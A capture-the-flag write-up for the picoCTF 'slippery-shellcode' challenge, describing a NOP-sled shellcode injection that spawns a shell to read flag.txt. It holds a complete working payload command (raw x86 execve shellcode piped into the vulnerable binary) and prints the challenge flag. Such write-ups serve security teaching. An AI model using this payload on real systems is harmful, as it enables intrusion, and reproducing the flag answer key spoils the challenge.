slippery-shellcode

Problem

This program is a little bit more tricky. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/slippery-shellcode_5_5cea4ae04c57923484bda350da9f4015 on the shell server. Source.

Solution

  1. Get some quality shellcode from ShellStorm

  2. I used Linux/x86 - execve(/bin/bash, [/bin/sh, -p], NULL) - 33 bytes by Jonathan Salwan at http://shell-storm.org/shellcode/files/shellcode-606.php

  3. The buffer is 512 bytes, so the NOP sled fills whatever the shellcode leaves free: buffer_size - payload_size = nop_sled_size, i.e. 512 - 33 = 479

  4. Create the payload (479 NOP bytes followed by the 33-byte shellcode) and feed it to the program, keeping stdin open with cat so the spawned shell can take commands:

     (python2 -c "print '\x90'*479 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80'" ; cat) | ./vuln

  5. In the spawned shell, run cat flag.txt

Flag

picoCTF{sl1pp3ry_sh311c0d3_ecc37b22}
